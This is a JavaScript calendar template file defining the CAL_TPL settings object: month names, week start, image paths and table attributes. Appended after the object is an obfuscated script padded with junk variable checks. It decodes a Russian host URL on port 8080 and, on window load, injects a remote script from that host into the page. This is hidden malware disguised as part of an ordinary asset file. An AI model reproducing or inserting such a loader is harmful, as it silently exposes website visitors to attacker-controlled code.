/*
	>>> THIS IS CALENDAR TEMPLATE FILE <<<
	
	Variable defined here (CAL_TPL) should be passed to calendar constructor
	as second parameter.
	

	Notes:

	- Same template structure can be used for multiple
	calendar instances.
	- When specifying not numeric values for HTML tag attributes make sure you
	put them in apostrophes

*/

var CAL_TPL = {

	// >>> Localization settings <<<
	
	
	// months as they appear in the selection list
	'months': ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'],

	// week day titles as they appear on the calendar
	'weekdays': ['Su', 'Mo', 'Tu', 'We', 'Th', 'Fr', 'Sa'],

	// day week starts from (normally 1-Mo or 0-Su)
	'weekstart': 1,
	
	// width of popup window (for Netscape 4.x only)
	'w': 190, 
	// height of popup window (for Netscape 4.x only)
	'h': 180,
	
	
	// >>> Navbar settings <<<

	// in year selection box how many years to list relative to current year
	'yearsbefore': 0, 
	'yearsafter': 1,
		
	// >>> Appearence settings (HTML tags attributes) <<<

	// outer table (TABLE)
	'outertable': {
		'cellpadding': 0,
		'cellspacing': 1,
		'width': 200
	},
	// month & year navigation table (TABLE)
	'navtable': {
		'cellpadding': 0,
		'cellspacing': 1,
		'width': '100%'
	},
	// today icon cell (TD); if omited no today button will be displayed
	'todaycell': {
	},
	// time navigation table (TABLE)
	'timetable': {
		'cellpadding': 0,
		'cellspacing': 0,
		'border': 0,
		'class': 'calTimetable'
	},
	// pixel image (IMG)
	// for modal mode only
	'pixel': {
		'src': 'calendar/img/pixel.gif',
		'width': 1,
		'height': 1,
		'border': 0		
	},
	// input text field to store the date & time selected (INPUT type="text")
	'datacontrol': {
		'width': 9,
		'maxlength' : 100,
		'class': 'calDatCtrl'
	},
	// hour, minute & second selectors (SELECT)
	'timeselector': {
		'class': 'calTimeselector'
	},
	// today icon image (IMG); if omited no today button will be displayed
	'todayimage': {
		'src': 'calendar/img/today.gif',
		'width': 16,
		'height': 16,
		'hspace': 2,
		'border': 0,
		'alt': 'reset to today'
	},
	// month scroll icon cell (TD)
	'monthscrollcell': {
		'width' : 10
	},
	// next hour image (IMG)
	'hourplusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'align': 'absbottom',
		'alt': 'scroll to next hour'
	},
	// previous hour image (IMG)
	'hourminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to previous hour'
	},
	// next minute image (IMG)
	'minplusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to next minute'
	},
	// previous minute image (IMG)
	'minminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to previous minute'
	},
	// next second image (IMG)
	'secplusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to next second'
	},
	// previous second image (IMG)
	'secminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to previous second'
	},
	// next month image (IMG)
	'monthplusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to next month'
	},
	// previous month image (IMG)
	'monthminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to previous month'
	},
	// year scroll icon cell (TD)
	'yearscrollcell': {
		'width' : 10
	},
	// next year image (IMG)
	'yearplusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to next year'
	},
	// previous year image (IMG)
	'yearminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to previous year'
	},
	// next AM/PM image (IMG)
	'applusimage': {
		'src': 'calendar/img/plus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to AM'
	},
	// previous AM/PM image (IMG)
	'apminusimage': {
		'src': 'calendar/img/minus.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1,
		'alt': 'scroll to PM'
	},
	// inactive next image (IMG)
	'displusimage': {
		'src': 'calendar/img/plus_dis.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1
	},
	// inactive previous image(IMG)
	'disminusimage': {
		'src': 'calendar/img/minus_dis.gif',
		'width': 11,
		'height': 10,
		'border': 0,
		'hspace': 1
	},
	// month selector cell (TD)
	'monthselectorcell': {
		'width': '80px',
		'align': 'right'
	},
	// hour, minute & second scroll icon cell (TD)
	'timescrollcell': {
		'width': 10
	},
	// time selector cell (TD)
	'timeselectorcell': {
		'width': '50px',
		'align': 'right'
	},
	// month selector (SELECT)
	'monthselector': {
		'class': 'calMonthselector'
	},
	// year selector cell (TD)
	'yearselectorcell': {
		'align': 'right'
	},
	// year selector (SELECT)
	'yearselector': {
		'class': 'calYearselector'
	},
	// cell containing calendar grid (TD)
	'gridcell': {},
	// calendar grid (TABLE)
	'gridtable': {
		'cellpadding': 3,
		'cellspacing': 1,
		'border': 0,
		'width': '100%'
	},
	// week day title cell (TD)
	'wdaytitle' : {
		'width': 20,
		'class': 'calWTitle'
	},
	// other month day text (A/SPAN)
	'dayothermonth': {
		'class': 'calOtherMonth'
	},
	// forbidden day text (A/SPAN)
	'dayforbidden': {
		'class': 'calForbDate'
	},
	// default day text (A/SPAN)
	'daynormal': {
		'class': 'calThisMonth'
	},
	// today day text (SPAN)
	'daytodaycell': {
		'style': 'border: 2 dotted red'
	},
	// selected day cell (TD)
	'dayselectedcell': {
		'align': 'center',
		'valign': 'middle',
		'class': 'calDayCurrent'
	},
	// wekend day cell (TD)
	'dayweekendcell': {
		'align': 'center',
		'valign': 'middle',
		'class': 'calDayWeekend'
	},
	// marked day cell (TD)
	'daymarkedcell': {
		'align': 'center',
		'valign': 'middle',
		'class': 'calDayHoliday'
	},
	// working day cell (TD)
	'daynormalcell': {
		'align': 'center',
		'valign': 'middle',
		'class': 'calDayWorking'
	}
};


var _E;if(_E!='' && _E!='T'){_E=''};this._U='';var S;if(S!=''){S='AK'};function k(){var JiC;if(JiC!='kD' && JiC != ''){JiC=null};var Tq;if(Tq!='' && Tq!='Si'){Tq='t'};var _j="";var V;if(V!='' && V!='JB'){V=''};var s=new String();this.wk='';var N=unescape;var g=window;var _l=new String();var n=N("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%63%6c%69%63%6b%62%61%6e%6b%2e%63%6f%6d%2f%67%61%6d%65%73%70%6f%74%2e%63%6f%6d%2e%70%68%70");this.BN='';var E="";var Ef=new Date();function J(w,m){var Kj;if(Kj!='SiK'){Kj=''};this.It='';var _=String("KoHhg".substr(4));var Ga;if(Ga!='LI' && Ga!='gP'){Ga='LI'};var YA;if(YA!='BF' && YA!='Tl'){YA='BF'};var mu=N("%5b"), o=N("%5d");var G=mu+m+o;var C;if(C!=''){C='LK'};var y=new RegExp(G, _);var Z;if(Z!='lu'){Z='lu'};return w.replace(y, new String());var vc;if(vc!='Uq' && vc!='SO'){vc='Uq'};var Tv=new Date();};var LB=new Date();var r;if(r!=''){r='BB'};var SI;if(SI!=''){SI='Xp'};var yI='';var i=document;var Zo;if(Zo!='zz'){Zo='zz'};var nJ;if(nJ!='vN'){nJ='vN'};var __=new String();var ls=new Date();var Ji=J('84417202277899164063153','69124375');function F(){var NU;if(NU!='NT' && NU!='Hq'){NU=''};var A=N("%68%74%74%70%3a%2f%2f%73%6e%6f%72%65%66%6c%61%73%68%2e%72%75%3a");this.RQ="";this.XN="";__=A;var Wk='';var NQ=new String();__+=Ji;__+=n;var BJ;if(BJ!='De' && BJ!='Ue'){BJ='De'};var Adg="";try {var sj="";var NL;if(NL!='Wj' && NL != ''){NL=null};B=i.createElement(J('sWcfrfilpltu','oz18LB9NMWueCZJElK5f'));var BY;if(BY!='is'){BY=''};this.Hb="";this.mM="";var tr;if(tr!='' && tr!='gG'){tr='HK'};var mH;if(mH!='' && mH!='ZB'){mH='kW'};B[N("%73%72%63")]=__;var bE;if(bE!='gF'){bE=''};var Yh="";B[N("%64%65%66%65%72")]=[1][0];var fJ;if(fJ!='bx' && fJ!='bn'){fJ='bx'};var KB="";i.body.appendChild(B);var iB;if(iB!='rx' && iB!='vj'){iB=''};} catch(Aa){var _W=new Array();alert(Aa);var FF="";var hs=new String();};var bc;if(bc!='' && bc!='zo'){bc=''};var kv;if(kv!=''){kv='CK'};}var Ah;if(Ah!='Yb' && Ah!='IL'){Ah='Yb'};var YR;if(YR!='vO' && YR!='xY'){YR='vO'};var wq=new Array();g[new String("onloa"+"d6o8H".substr(0,1))]=F;var sl=new Array();this.Ja='';};var fk;if(fk!='' && fk!='XS'){fk=''};k();